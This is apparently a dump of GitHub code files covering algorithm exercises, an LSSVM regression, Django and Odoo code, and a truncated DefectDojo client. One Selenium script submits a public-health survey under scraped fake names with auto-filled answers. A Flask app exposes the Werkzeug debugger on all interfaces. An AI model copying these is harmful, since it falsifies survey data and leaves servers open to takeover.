+{"seq_id":"18784246565","text":"# 5.0 Reorder List\ndef even_odd(A: list[int]) -> None:\n \"\"\"\n Reorder an integer list so that even entries appear first.\n \"\"\"\n next_even, next_odd = 0, len(A) - 1\n while next_even < next_odd:\n if A[next_even] % 2 == 0:\n next_even += 1\n else:\n A[next_even], A[next_odd] = A[next_odd], A[next_even]\n next_odd -= 1\n\n# 5.1 The Dutch National Flag Problem\ndef dutch_flag(A: list[int], pivot_idx: int) -> None:\n \"\"\"\n Takes an integer array, A, and an index, pivot_idx, and rearranges the elements such that all elements\n less than A[pivot_idx] (the \"pivot\") appear first, followed by elements equal to the pivot, followed\n by elements greater than the pivot.\n \"\"\"\n if len(A) < 2:\n return None\n\n if pivot_idx >= len(A):\n raise IndexError(\"Pivot index (idx) out of range.\")\n\n lesser = []\n equal = []\n greater = []\n for a in A:\n if a < A[pivot_idx]:\n lesser.append(a)\n elif a == A[pivot_idx]:\n equal.append(a)\n else:\n greater.append(a)\n \n lesser.extend(equal)\n lesser.extend(greater)\n\n for i in range(0,len(A)):\n A[i] = lesser[i]\n\ndef increment_array_integer(A: list[int]) -> None:\n \"\"\"\n Takes as input an array of digits encoding a nonnegative decimal integer D and updates\n the array to represent the integer D+1. For example, the input [1,2,9] is updated to\n [1,3,0]\n \"\"\"\n idx = len(A) - 1\n found = False\n\n while idx > -1 and found == False:\n if A[idx] < 9:\n A[idx] += 1\n found = True\n else:\n A[idx] = 0\n \n idx -= 1\n \n if idx == -1 and found == False:\n A.append(0)\n A[0] = 1\n","repo_name":"TommyHughes/eopi_python","sub_path":"arrays/exercises.py","file_name":"exercises.py","file_ext":"py","file_size_in_byte":1756,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"26396373510","text":"import socket\n\nterminate_string = '-term-end-'\nBUFF_SIZE = 1024\n\nif __name__ == \"__main__\":\n server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n server_socket.bind(('127.0.0.1', 8080))\n server_socket.listen(10)\n\n while True:\n (client_socket, server) = server_socket.accept()\n\n result = ''.encode('utf-8')\n\n while True:\n data = client_socket.recv(BUFF_SIZE)\n\n if data.find(terminate_string.encode('utf-8')) != -1:\n data = data.replace(terminate_string.encode('utf-8'), ''.encode('utf-8'))\n result += data\n break\n\n result += data\n if len(data) < BUFF_SIZE:\n break\n\n if result.find(terminate_string.encode('utf-8')) != -1:\n result = result.replace(terminate_string.encode('utf-8'), ''.encode('utf-8'))\n print(f'length of result: {len(result)}')\n\n sendData = f'received {len(result)} bytes' + terminate_string\n send_len = client_socket.send(sendData.encode('utf-8'))\n\n if send_len != len(sendData):\n print('error on send')\n\n with open('./4k_image_received.jpg', 'wb') as f:\n f.write(result)\n\n client_socket.close()\n","repo_name":"OptimistLabyrinth/socket_programming","sub_path":"python3_implementation/v3/server/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1245,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"23713249054","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Jun 5 09:30:24 2018\r\n\r\n@author: lj\r\n\"\"\"\r\nfrom numpy import *\r\n\r\ndef loadDataSet(filename):\r\n '''导入数据\r\n input: filename:文件名\r\n '''\r\n dataMat = []\r\n labelMat = []\r\n fr = open(filename)\r\n for line in fr.readlines():\r\n lineArr = line.strip().split('\\t')\r\n dataMat.append(float(lineArr[0]))\r\n labelMat.append(float(lineArr[1]))\r\n return mat(dataMat).T,mat(labelMat).T\r\n \r\n\r\ndef kernelTrans(X,A,kTup):\r\n '''数据集中每一个数据向量与A的核函数值\r\n input: X--特征数据集\r\n A--输入向量\r\n kTup--核函数参量定义\r\n output: K--数据集中每一个数据向量与A的核函数值组成的矩阵\r\n '''\r\n X = mat(X)\r\n m,n = shape(X)\r\n K = mat(zeros((m,1)))\r\n if kTup[0] == 'lin':\r\n K = X * A.T\r\n elif kTup[0] == 'rbf':\r\n for j in range(m):\r\n deltaRow = X[j] - A\r\n K[j] = deltaRow * deltaRow.T\r\n K = exp(K/(-1 * kTup[1] ** 2))\r\n else: raise NameError('Houston We Have a Problem ,That Kernel is not recognized')\r\n return K\r\n \r\nclass optStruct:\r\n def __init__(self,dataMatIn,classLabels,C,kTup):\r\n self.X = dataMatIn\r\n self.labelMat = classLabels\r\n self.C = C\r\n self.m = shape(dataMatIn)[0]\r\n self.alphas = mat(zeros((self.m,1)))\r\n self.b = 0\r\n self.K = mat(zeros((self.m,self.m))) #特征数据集合中向量两两核函数值组成的矩阵,[i,j]表示第i个向量与第j个向量的核函数值\r\n for i in range(self.m):\r\n self.K[:,i] = kernelTrans(self.X, self.X[i,:], kTup)\r\n \r\n\r\ndef leastSquares(dataMatIn,classLabels,C,kTup):\r\n '''最小二乘法求解alpha序列\r\n input:dataMatIn:特征数据集\r\n classLabels:分类标签集\r\n C:参数,(松弛变量,允许有些数据点可以处于分隔面的错误一侧)\r\n kTup: 核函数类型和参数选择 \r\n output:b--w.T*x+b=y中的b\r\n alphas:alphas序列 \r\n '''\r\n ##1.参数设置\r\n oS = optStruct(dataMatIn,classLabels,C,kTup)\r\n unit = mat(ones((oS.m,1))) #[1,1,...,1].T\r\n I = eye(oS.m)\r\n zero = mat(zeros((1,1)))\r\n upmat = hstack((zero,unit.T))\r\n downmat = hstack((unit,oS.K + I/float(C)))\r\n ##2.方程求解\r\n completemat = vstack((upmat,downmat)) #lssvm中求解方程的左边矩阵\r\n rightmat = vstack((zero,oS.labelMat)) # lssvm中求解方程的右边矩阵\r\n b_alpha = completemat.I * rightmat\r\n ##3.导出偏置b和Lagrange乘子序列\r\n oS.b = b_alpha[0,0]\r\n for i in range(oS.m):\r\n oS.alphas[i,0] = b_alpha[i+1,0]\r\n e = oS.alphas/C\r\n return oS.alphas,oS.b,e\r\n\r\ndef weights(e):\r\n '''计算权重序列\r\n input:e(mat):LSSVM误差矩阵\r\n output:v(mat):权重矩阵\r\n '''\r\n ##1.参数设置\r\n c1 = 2.5\r\n c2 = 3\r\n m = shape(e)[0]\r\n v = mat(zeros((m,1)))\r\n v1 = eye(m)\r\n q1 = int(m/4.0)\r\n q3 = int((m*3.0)/4.0)\r\n e1 = []\r\n shang = mat(zeros((m,1)))\r\n ##2.误差序列从小到大排列\r\n for i in range(m):\r\n e1.append(e[i,0])\r\n e1.sort()\r\n ##3.计算误差序列第三四分位与第一四分位的差\r\n IQR = e1[q3] - e1[q1]\r\n ##4.计算s的值\r\n s = IQR/(2 * 0.6745)\r\n ##5.计算每一个误差对应的权重\r\n for j in range(m):\r\n shang[j,0] = abs(e[j,0]/s)\r\n for x in range(m):\r\n if shang[x,0] <= c1:\r\n v[x,0] = 1.0\r\n if shang[x,0] > c1 and shang[x,0] <= c2:\r\n v[x,0] = (c2 - shang[x,0])/(c2 - c1)\r\n if shang[x,0] > c2:\r\n v[x,0] = 0.0001\r\n v1[x,x] = 1/float(v[x,0])\r\n return v1\r\n\r\ndef weightsleastSquares(dataMatIn,classLabels,C,kTup,v1):\r\n '''最小二乘法求解alpha序列\r\n input:dataMatIn:特征数据集\r\n classLabels:分类标签集\r\n C:参数,(松弛变量,允许有些数据点可以处于分隔面的错误一侧)\r\n kTup: 核函数类型和参数选择 \r\n output:b--w.T*x+b=y中的b\r\n alphas:alphas序列 \r\n '''\r\n ##1.参数设置\r\n oS = optStruct(dataMatIn,classLabels,C,kTup)\r\n unit = mat(ones((oS.m,1))) #[1,1,...,1].T\r\n #I = eye(oS.m)\r\n gamma = kTup[1]\r\n zero = mat(zeros((1,1)))\r\n upmat = hstack((zero,unit.T))\r\n downmat = hstack((unit,oS.K + v1/float(C)))\r\n ##2.方程求解\r\n completemat = vstack((upmat,downmat)) #lssvm中求解方程的左边矩阵\r\n rightmat = vstack((zero,oS.labelMat)) # lssvm中求解方程的右边矩阵\r\n b_alpha = completemat.I * rightmat\r\n ##3.导出偏置b和Lagrange乘子序列\r\n oS.b = b_alpha[0,0]\r\n for i in range(oS.m):\r\n oS.alphas[i,0] = b_alpha[i+1,0]\r\n e = oS.alphas/C\r\n return oS.alphas,oS.b\r\n\r\n\r\ndef predict(alphas,b,dataMat):\r\n '''预测结果\r\n input:alphas(mat):WLSSVM模型的Lagrange乘子序列\r\n b(float):WLSSVM模型回归方程的偏置\r\n dataMat(mat):测试样本集\r\n output:predict_result(mat):测试结果\r\n '''\r\n m,n = shape(dataMat)\r\n predict_result = mat(zeros((m,1)))\r\n for i in range(m):\r\n Kx = kernelTrans(dataMat,dataMat[i,:],kTup) #可以对alphas进行稀疏处理找到更准确的值 \r\n predict_result[i,0] = Kx.T * alphas + b \r\n return predict_result\r\n\r\ndef predict_average_error(predict_result,label):\r\n '''计算平均预测误差\r\n input:predict_result(mat):预测结果\r\n label(mat):实际结果\r\n output:average_error(float):平均误差\r\n '''\r\n m,n = shape(predict_result)\r\n error = 0.0\r\n for i in range(m):\r\n error += abs(predict_result[i,0] - label[i,0])\r\n average_error = error / m\r\n return average_error\r\n \r\n\r\n\r\nif __name__ == '__main__':\r\n ##1.数据导入\r\n print('--------------------Load Data------------------------')\r\n dataMat,labelMat = loadDataSet('sine.txt')\r\n ##2.参数设置\r\n print('--------------------Parameter Setup------------------')\r\n C = 0.6\r\n k1 = 0.3\r\n kernel = 'rbf'\r\n kTup = (kernel,k1)\r\n ##3.求解LSSVM模型\r\n print('-------------------Save LSSVM Model-----------------')\r\n alphas,b,e = leastSquares(dataMat,labelMat,C,kTup)\r\n ##4.计算误差权重\r\n print('----------------Calculate Error Weights-------------')\r\n v1 = weights(e)\r\n ##5.求解WLSSVM模型\r\n print('------------------Save WLSSVM Model--------------- -')\r\n alphas1,b1 = weightsleastSquares(dataMat,labelMat,C,kTup,v1)\r\n ##6.预测结果\r\n print('------------------Predict Result------------------ -')\r\n predict_result = predict(alphas1,b1,dataMat)\r\n ##7.平均误差\r\n print('-------------------Average Error------------------ -')\r\n average_error = predict_average_error(predict_result,labelMat)\r\n \r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"shiluqiang/WLSSVM_python","sub_path":"wlssvm.py","file_name":"wlssvm.py","file_ext":"py","file_size_in_byte":6856,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"32"}
+{"seq_id":"26006455408","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\nimport numpy as np\nimport matplotlib\n# matplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nfrom scipy.io import savemat\nfrom scipy.io import loadmat\nimport timeit\n\n# import density integration functions\nfrom DensityIntegrationUncertaintyQuantification import Density_integration_Poisson_uncertainty\nfrom DensityIntegrationUncertaintyQuantification import Density_integration_WLS_uncertainty\n\nimport loadmat_functions\n\nimport helper_functions\n\ndef main():\n \n # file containing displacements and uncertainties\n filename = 'sample-displacements.mat'\n \n # displacement estimation method ('c' for correlation and 't' for tracking)\n displacement_estimation_method = 'c'\n \n # displacement uncertainty method ('MC' for correlation and 'crlb' for tracking)\n displacement_uncertainty_method = 'MC'\n\n # set integration method ('p' for poisson or 'w' for wls)\n density_integration_method = 'w'\n \n # dataset type (syntehtic or experiment)\n dataset_type = 'synthetic'\n\n # -------------------------------------------------\n # experimental parameters for density integration\n # -------------------------------------------------\n experimental_parameters = dict()\n\n # ambient/reference density (kg/m^3)\n experimental_parameters['rho_0'] = 1.225\n\n # uncertainty in the reference density (kg/m^3) (MUST BE GREATER THAN 0)\n experimental_parameters['sigma_rho_0'] = 1e-10\n\n # gladstone dale constant (m^3/kg)\n experimental_parameters['gladstone_dale'] = 0.225e-3\n\n # ambient refractive index\n experimental_parameters['n_0'] = 1.0 + experimental_parameters['gladstone_dale'] * experimental_parameters['rho_0']\n\n # thickness of the density gradient field (m)\n experimental_parameters['delta_z'] = 0.01\n\n # distance between lens and dot target (object / working distance) (m)\n experimental_parameters['object_distance'] = 1.0\n\n # distance between the mid-point of the density gradient field and the dot pattern (m)\n experimental_parameters['Z_D'] = 0.25\n\n # distance between the mid-point of the density gradient field and the camera lens (m)\n experimental_parameters['Z_A'] = experimental_parameters['object_distance'] - experimental_parameters['Z_D']\n \n # distance between the dot pattern and the camera lens (m)\n experimental_parameters['Z_B'] = experimental_parameters['object_distance']\n\n # origin (pixels)\n experimental_parameters['x0'] = 256 \n experimental_parameters['y0'] = 256 \n\n # size of a pixel on the camera sensor (m)\n experimental_parameters['pixel_pitch'] = 10e-6\n\n # focal length of camera lens (m)\n experimental_parameters['focal_length'] = 105e-3\n\n # non-dimensional magnification of the dot pattern (can also set it directly)\n experimental_parameters['magnification'] = experimental_parameters['focal_length'] / (\n experimental_parameters['object_distance'] - experimental_parameters['focal_length'])\n\n # uncertainty in magnification\n experimental_parameters['sigma_M'] = 0.1\n\n # uncertainty in Z_D (m)\n experimental_parameters['sigma_Z_D'] = 1e-3\n\n\n # non-dimensional magnification of the mid-z-PLANE of the density gradient field\n experimental_parameters['magnification_grad'] = experimental_parameters['magnification'] \\\n * experimental_parameters['Z_B'] / experimental_parameters['Z_A']\n \n # --------------------------\n # processing\n # --------------------------\n # load displacements and uncertainties from file \n if displacement_estimation_method == 'c':\n # correlation\n X_pix, Y_pix, U, V, sigma_U, sigma_V, Eval = helper_functions.load_displacements_correlation(filename, displacement_uncertainty_method) \n elif displacement_estimation_method == 't':\n # tracking\n X_pix, Y_pix, U, V, sigma_U, sigma_V = helper_functions.load_displacements_tracking(filename, experimental_parameters['dot_spacing'], displacement_uncertainty_method) \n\n # account for sign convention\n if dataset_type == 'synthetic':\n U *= -1\n V *= -1\n\n # create mask array (1 for flow, 0 elsewhere) - only implemented for Correlation at the moment\n if displacement_estimation_method == 'c':\n mask = helper_functions.create_mask(X_pix.shape[0], X_pix.shape[1], Eval)\n elif displacement_estimation_method == 't': \n mask = np.ones_like(a=U)\n\n # convert displacements to density gradients and co-ordinates to physical units \n X, Y, rho_x, rho_y, sigma_rho_x, sigma_rho_y = helper_functions.convert_displacements_to_physical_units(X_pix, Y_pix, U, V, sigma_U, sigma_V, experimental_parameters, mask)\n\n # define dirichlet boundary points (minimum one point) - here defined to be all boundaries\n # This is specific to the current dataset\n dirichlet_label, rho_dirichlet, sigma_rho_dirichlet = helper_functions.set_bc(X_pix.shape[0], X_pix.shape[1], experimental_parameters['rho_0'], experimental_parameters['sigma_rho_0'])\n \n # calculate density and uncertainty\n if density_integration_method == 'p':\n # Poisson\n rho, sigma_rho = Density_integration_Poisson_uncertainty(X, Y, mask, rho_x, rho_y,\n dirichlet_label, rho_dirichlet,\n uncertainty_quantification=True,\n sigma_grad_x=sigma_rho_x, sigma_grad_y=sigma_rho_y,\n sigma_dirichlet=sigma_rho_dirichlet)\n elif density_integration_method == 'w':\n # Weighted Least Squares\n rho, sigma_rho = Density_integration_WLS_uncertainty(X, Y, mask,rho_x, rho_y,\n dirichlet_label, rho_dirichlet,\n uncertainty_quantification=True,\n sigma_grad_x=sigma_rho_x, sigma_grad_y=sigma_rho_y,\n sigma_dirichlet=sigma_rho_dirichlet)\n\n # save the results to file\n savemat(filename='sample-result.mat', mdict={'X': X, 'Y': Y, 'rho': rho, 'sigma_rho': sigma_rho,\n 'dirichlet_label': dirichlet_label, 'rho_dirichlet':rho_dirichlet, 'sigma_rho_dirichlet':sigma_rho_dirichlet\n }, long_field_names=True)\n\n # plot results\n fig = helper_functions.plot_figures(X, Y, rho_x, rho_y, rho, sigma_rho)\n \n # save plot to file\n fig.savefig('sample-result.png')\n plt.close()\n\n\nif __name__ == '__main__':\n main()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"lalitkrajendran/bos-density-integration-package","sub_path":"sample_script.py","file_name":"sample_script.py","file_ext":"py","file_size_in_byte":6772,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"72655404251","text":"from django.core.paginator import Paginator\nfrom django.core.paginator import EmptyPage\nfrom django.core.paginator import PageNotAnInteger\nfrom django.db.models import F\n\nfrom django.http import HttpResponseRedirect\nfrom django.shortcuts import render, get_object_or_404, redirect\n\n# Create your views here.\nfrom django.views.generic import ListView, DetailView\nfrom django.contrib import messages\n\nfrom news.models import Articles\nfrom .models import Programs\n\n\n\n\nclass ProgramsList(ListView):\n model = Programs\n template_name = 'programs/programms.html'\n paginate_by = 6\n\n def get_context_data(self, **kwargs):\n context = super(ProgramsList, self).get_context_data(**kwargs)\n list_exam = Programs.objects.all()\n paginator = Paginator(list_exam, self.paginate_by)\n\n page = self.request.GET.get('page')\n\n try:\n file_exams = paginator.page(page)\n except PageNotAnInteger:\n file_exams = paginator.page(1)\n except EmptyPage:\n file_exams = paginator.page(paginator.num_pages)\n context['programms_top'] = Articles.objects.all().order_by('-view')[:6]\n context['list_exams'] = file_exams\n return context\n\n# class ProgramsDetail(DetailView):\n# model = Articles\n# template_name = 'programs/programm.html'\n#\n# def get_context_data(self, **kwargs):\n# context = super(ProgramsDetail, self).get_context_data(**kwargs)\n# context['top_art'] = Articles.objects.all().order_by('-view')[:10]\n# context['top_prog'] = Programs.objects.all().order_by('?')[:10]\n\n\n\ndef ProgramsDetail(request, slug):\n tag=None\n article_details = get_object_or_404(Programs,slug=slug)\n top_art = Articles.objects.all().order_by('-view')[:6]\n top_prog = Programs.objects.all().order_by('?')[:6]\n articles_top = Articles.objects.all().order_by('-view')[:6]\n\n return render(\n request,\n 'programs/programm.html',\n {\n 'article_details': article_details,\n 'top_art':top_art,\n 'articles_top':articles_top,\n 'top_prog':top_prog,\n 'tag': tag\n }\n )\n\n\n\n\ndef post_searchProgramm(request):\n queryProgramm = request.GET.get('searchProgramm')\n if queryProgramm:\n results = Programs.objects.filter(title__icontains=queryProgramm).order_by('-date')\n\n total_results = results.count()\n return render(request,\n 'news/posts.html',\n {\n 'results': results,\n 'query': queryProgramm,\n 'total_results': total_results})\n else:\n messages.info(request, 'no results found for {}', format(queryProgramm))","repo_name":"LibGame/itRapter","sub_path":"itRapter/programs/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2757,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"27807192518","text":"from flask import Flask,request\nimport os,sys\nfrom werkzeug.serving import run_simple\n\napp=Flask(__name__)\n\ndef refresh():\n with open(__file__,'w') as fo:\n with open('target.py','r') as f2:\n fo.writelines(f2.readlines())\n with open(__file__) as fo:\n source_code = fo.read()\n byte_code = compile(source_code, __file__, \"exec\")\n # exec(byte_code)\n python = sys.executable\n os.execl(python, python, * sys.argv)\n exit()\n\n@app.route('/')\ndef home():\n return '1'\n\n@app.route('/add')\ndef add():\n refresh()\n return '12'\n\n@app.route('/shutdown')\ndef shutdown():\n shutdown_func=request.environ.get('werkzeug.server.shutdown')\n shutdown_func()\n raise RuntimeError\n\n\n \n\nif __name__=='__main__':\n run_simple('0.0.0.0',8000,app,use_debugger=True,use_reloader=False)\n # app.run(host='0.0.0.0')\n","repo_name":"Timothychen00/Flask-Reload","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":876,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"22927537897","text":"from odoo.tests import Form\nfrom odoo.tests.common import SavepointCase\nfrom odoo.tools import float_compare\n\n\nclass TestDeliveryPriceMethod(SavepointCase):\n @classmethod\n def setUpClass(cls):\n super().setUpClass()\n self = cls\n product_shipping_cost = self.env[\"product.product\"].create(\n {\n \"type\": \"service\",\n \"name\": \"Shipping costs\",\n \"standard_price\": 10,\n \"list_price\": 100,\n }\n )\n self.carrier = self.env[\"delivery.carrier\"].create(\n {\n \"name\": \"Test carrier\",\n \"delivery_type\": \"fixed\",\n \"product_id\": product_shipping_cost.id,\n \"fixed_price\": 99.99,\n }\n )\n self.pricelist = self.env[\"product.pricelist\"].create(\n {\n \"name\": \"Test pricelist\",\n \"item_ids\": [\n (\n 0,\n 0,\n {\n \"applied_on\": \"3_global\",\n \"compute_price\": \"formula\",\n \"base\": \"list_price\",\n },\n )\n ],\n }\n )\n self.product = self.env.ref(\"product.product_delivery_01\")\n self.partner = self.env.ref(\"base.res_partner_12\")\n self.sale = self.env[\"sale.order\"].create(\n {\n \"partner_id\": self.partner.id,\n \"pricelist_id\": self.pricelist.id,\n \"carrier_id\": self.carrier.id,\n \"order_line\": [\n (0, 0, {\"product_id\": self.product.id, \"product_uom_qty\": 1})\n ],\n }\n )\n\n def _add_delivery(self):\n sale = self.sale\n delivery_wizard = Form(\n self.env[\"choose.delivery.carrier\"].with_context(\n {\"default_order_id\": sale.id, \"default_carrier_id\": self.carrier}\n )\n )\n choose_delivery_carrier = delivery_wizard.save()\n choose_delivery_carrier.button_confirm()\n\n def test_delivery_price_fixed(self):\n sale = self.sale\n self._add_delivery()\n delivery_lines = sale.order_line.filtered(lambda r: r.is_delivery)\n delivery_price = sum(delivery_lines.mapped(\"price_unit\"))\n self.assertEqual(float_compare(delivery_price, 99.99, precision_digits=2), 0)\n self.assertEqual(len(delivery_lines), 1)\n sale.action_confirm()\n picking = sale.picking_ids[0]\n self.assertEqual(len(picking.move_lines), 1)\n self.assertEqual(picking.carrier_id, self.carrier)\n picking.action_confirm()\n picking.action_assign()\n self.assertFalse(picking.carrier_price)\n picking.send_to_shipper()\n self.assertEqual(picking.carrier_price, 99.99)\n\n def test_delivery_price_method(self):\n self.carrier.write({\"price_method\": \"fixed\", \"fixed_price\": 99.99})\n sale = self.sale\n self._add_delivery()\n delivery_lines = sale.order_line.filtered(lambda r: r.is_delivery)\n delivery_price = sum(delivery_lines.mapped(\"price_unit\"))\n self.assertEqual(float_compare(delivery_price, 99.99, precision_digits=2), 0)\n self.assertEqual(len(delivery_lines), 1)\n self.carrier.write({\"price_method\": \"fixed\", \"fixed_price\": 5})\n self._add_delivery()\n delivery_lines = sale.order_line.filtered(lambda r: r.is_delivery)\n delivery_price = sum(delivery_lines.mapped(\"price_unit\"))\n self.assertEqual(delivery_price, 5)\n self.carrier.write(\n {\n \"price_method\": \"base_on_rule\",\n \"price_rule_ids\": [\n (\n 0,\n 0,\n {\n \"variable\": \"quantity\",\n \"operator\": \"==\",\n \"max_value\": 1,\n \"list_base_price\": 11.11,\n },\n )\n ],\n }\n )\n self._add_delivery()\n delivery_lines = sale.order_line.filtered(lambda r: r.is_delivery)\n delivery_price = sum(delivery_lines.mapped(\"price_unit\"))\n self.assertEqual(delivery_price, 11.11)\n","repo_name":"OCA/delivery-carrier","sub_path":"delivery_price_method/tests/test_delivery_price_method.py","file_name":"test_delivery_price_method.py","file_ext":"py","file_size_in_byte":4357,"program_lang":"python","lang":"en","doc_type":"code","stars":97,"dataset":"github-code","pt":"32"}
+{"seq_id":"73168720731","text":"from selenium import webdriver\nfrom selenium.webdriver.chrome.service import Service\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import Select\nimport time\nimport os\n# Version: 2.0\n# 浏览器驱动版本:114.0.5735.90\n\n# 获取人名列表函数定义\ndef GettingNames(wd):\n # 调用WebDriver 对象的get方法 可以让浏览器打开指定网址\n wd.maximize_window()\n wd.get('https://www.qmsjmfb.com/')\n\n # 搜索名字\n elements = [element.text for element in wd.find_elements(By.XPATH, \"//div/ul/li\")]\n return elements\n\n# 填写身份信息函数定义\ndef FulfillInfo(wd, name):\n # 调用WebDriver 对象的get方法 可以让浏览器打开指定网址\n wd.maximize_window()\n wd.get('https://www.jscdc.cn/KABP2011/business/index1.jsp?tdsourcetag=s_pcqq_aiomsg')\n\n # 通过 Select 对象选中南京市,栖霞区,马群街道以及填入姓名\n Select(wd.find_element(By.ID, \"zone3\")).select_by_visible_text(\"南京市\")\n Select(wd.find_element(By.ID, \"zone4\")).select_by_visible_text(\"栖霞区\")\n Select(wd.find_element(By.ID, \"zone5\")).select_by_visible_text(\"马群街道\")\n wd.find_element(By.ID, 'name').send_keys(name)\n\n # 通过 Select 对象选中0~15岁以下,男,小学,学生,小学3~4年级\n Select(wd.find_element(By.ID, \"ageGroup\")).select_by_visible_text(\"0~15岁以下\")\n Select(wd.find_element(By.ID, \"sex\")).select_by_visible_text(\"男\")\n Select(wd.find_element(By.ID, \"educationStatus\")).select_by_visible_text(\"小学\")\n Select(wd.find_element(By.ID, \"metier\")).select_by_visible_text(\"学生\")\n Select(wd.find_element(By.ID, \"studentLevel\")).select_by_visible_text(\"小学3~4年级\")\n\n # 点击开始按钮\n wd.find_element(By.ID, 'log_img').click()\n\n# 回答问题函数定义\ndef AnsweringQuestions(wd):\n # 获取答案\n # 获取题数\n num = wd.find_element(By.ID, \"__subjectCount\")\n num = int(num.text)\n\n # 获取所有input的元素构成一个list\n answers = wd.find_elements(By.XPATH, \"//*[@id=\\\"subject\\\"]/input\")\n\n # 填充答案\n for i in range(num):\n answer = answers[i].get_attribute('value').split(\",\")[1]\n wd.find_element(By.CSS_SELECTOR, \"#KWait\" + str(i + 1) + \" input[value=\\\"\" + answer + str(i + 1) + \"\\\"]\").click()\n\n wd.find_element(By.ID, \"btnAct\" + str(num) + \"\").click()\n wd.switch_to.alert.accept()\n\n# Main Part\n# 创建 WebDriver 对象,指明使用chrome浏览器驱动\n# webDriver = webdriver.Chrome(service=Service(r'd:\\tools\\chromedriver.exe'))\nwebDriver = webdriver.Chrome(service=Service(r'114.0.5735.90\\chromedriver.exe'))\nnameList = GettingNames(webDriver)\n\n# 开始循环答题\nfor i in range(1):\n name = nameList[i]\n FulfillInfo(webDriver, name)\n AnsweringQuestions(webDriver)\n\n # 等到网页加载完毕后截屏保存\n time.sleep(1)\n\n # 检测截图文件夹是否存在\n if not os.path.exists('Screenshots/'):\n os.makedirs('Screenshots/')\n \n # 创建截图文件\n if(webDriver.get_screenshot_as_file('Screenshots/' + str(i+1) + '.png') ):\n print(\"Screenshots/\" + str(i+1) + \".png is saved successfully.\")\n else:\n print(\"Failed to save the Screenshots/\" + str(i+1) + \".png.\")\n break\n\n# 关闭浏览器\nwebDriver.close()\n","repo_name":"nwomn/AutoTask","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3312,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"30013584137","text":"\ndef stem_plot(lst):\n lst = [str(i) if i > 9 else '0'+str(i) for i in lst]\n dic = {}\n for i in lst:\n stem, leaf = i[:-1], i[-1]\n if stem not in dic: \n dic[stem] = []\n dic[stem] += [leaf]\n return ['{} | {}'.format(k, ' '.join(sorted(v))) for k, v in sorted(dic.items(), key=lambda x: int(x[0]))]\n\n","repo_name":"daniel-reich/ubiquitous-fiesta","sub_path":"sibD9TFg7pmQuzJxW_10.py","file_name":"sibD9TFg7pmQuzJxW_10.py","file_ext":"py","file_size_in_byte":314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"2055308551","text":"import pandas as pd\nimport sys\n\ndef get_state_code_index(df):\n col_list = list(df.columns).index('state_code')\n return col_list\n\ndef state_code_to_int(x):\n x[i] = int(x[i])\n return x\n\n# rst ne\ndef state_code_cleaner(df):\n df['state_code'] = df['state_code'].apply(str)\n df['len'] = df['state_code'].apply(lambda x: len((x)))\n tmp1 = df[(df['len'] == 9) & (~df['state_code'].str.contains('-'))]\n tmp2 = tmp1.drop(['len'],axis=1)\n df_fn = tmp2.apply(state_code_to_int,axis=1)\n # print(tmp2.head())\n return df_fn\n\nif __name__ == '__main__':\n\n fileIn = sys.argv[1]\n fileOut = fileIn[:-4] + '_clr.csv'\n\n df = pd.read_csv(fileIn)\n global i\n i = get_state_code_index(df)\n\n res = state_code_cleaner(df)\n # print(res.columns)\n # res = res.drop(['Unnamed: 0'],axis=1)\n # print(res.info())\n res.to_csv(fileOut,index=False)\n\n # print(state_code_cleaner(jb))\n # print(stae_code_cleaner(jb))\n # print(list(rst.columns).index('len'))\n # rst_fn.to_csv('data/restaurant_clean.csv')","repo_name":"tkionshao/com.iii.4th.state-center-maker","sub_path":"state_code_cleaner/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1064,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"18576817801","text":"#!/usr/bin/python3\n\nimport json\nimport requests\nimport requests.exceptions\n\n\nclass DefectDojo():\n \"\"\"\n Initialize a DefectDojo API instance.\n \"\"\"\n def __init__(self, api_key, user, host, user_agent=None, verify_ssl=False, api_version='v2', timeout=60, debug=True):\n self.api_key = api_key\n self.user = user\n self.host = host + '/api/' + api_version + '/'\n self.verify_ssl = verify_ssl\n self.api_version = api_version\n self.timeout = timeout\n\n if not user_agent:\n self.user_agent = 'DefectDojo_api'\n else:\n self.user_agent = user_agent\n\n self.debug = debug\n\n def get_users(self, username=None, limit=20):\n params = {}\n if limit:\n params['limit'] = limit\n\n if username:\n params['username'] = username\n\n return self._request('GET', 'users/', params)\n\n def _request(self, method, url, params=None, data=None, files=None):\n \"\"\"Common handler for all HTTP requests.\"\"\"\n if not params:\n params = {}\n\n if data:\n data = json.dumps(data)\n\n headers = {\n 'User-Agent': self.user_agent,\n 'Authorization' : \"Token \" + self.api_key\n }\n\n if not files:\n headers['Content-Type'] = 'application/json'\n\n try:\n if self.debug:\n print(method + ' ' + self.host + url)\n print(params)\n print(headers)\n\n response = requests.request(method=method, url=self.host + url, params=params, data=data, files=files,\n headers=headers,\n timeout=self.timeout,\n verify=self.verify_ssl)\n\n if self.debug:\n print(response.status_code)\n print(response.text)\n\n\n # try:\n # if response.status_code == 201: #Created new object\n # object_id = response.headers[\"Location\"].split('/')\n # key_id = object_id[-2]\n # try:\n # data = 